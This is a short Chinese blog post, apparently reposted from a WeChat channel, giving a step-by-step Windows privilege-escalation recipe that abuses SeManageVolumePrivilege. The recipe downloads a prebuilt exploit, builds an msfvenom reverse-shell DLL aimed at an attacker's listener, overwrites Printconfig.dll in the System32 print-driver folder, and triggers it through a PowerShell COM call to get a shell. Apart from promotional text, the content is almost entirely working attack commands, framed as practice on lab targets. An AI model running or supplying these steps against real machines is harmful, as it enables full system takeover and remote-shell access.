windows提权之SeManageVolumePrivilege提权

admin 2024年9月28日11:23:14评论19 views字数 947阅读3分9秒阅读模式

 SeManageVolumePrivilege提权手法

windows提权之SeManageVolumePrivilege提权

看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。

01

winodws提权

        打windows靶机的时候,如果你的权限里面有

SeManageVolumePrivilege 这个,那么可以使用这个姿势提权:

windows提权之SeManageVolumePrivilege提权

知识链接:https://github.com/CsEnox/SeManageVolumeExploit1.下好这个EXP:https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe2.在kali上生成dll文件:(根据具体情况改,但是dll的名字别换)msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.x.x LPORT=6666 -f dll -o Printconfig.dll3.将SeManageVolumeExploit.exe,Printconfig.dll上传到靶机4.运行SeManageVolumeExploit.exe运行这个脚本后,你应该有写入C盘的权限

windows提权之SeManageVolumePrivilege提权

5.移动Printconfig.dll到目标位置:move .Printconfig.dll C:WindowsSystem32spooldriversx643Printconfig.dll #这里可能存在同名的dll,直接覆盖就好了6.依次运行下面两行代码:$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")$object = [Activator]::CreateInstance($type)查看kali监听端口应该已经有shell弹回连了

windows提权之SeManageVolumePrivilege提权

windows提权之SeManageVolumePrivilege提权

windows提权之SeManageVolumePrivilege提权

原文始发于微信公众号(道玄网安驿站):windows提权之SeManageVolumePrivilege提权

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日11:23:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   windows提权之SeManageVolumePrivilege提权https://cn-sec.com/archives/3100947.html

发表评论

匿名网友 填写信息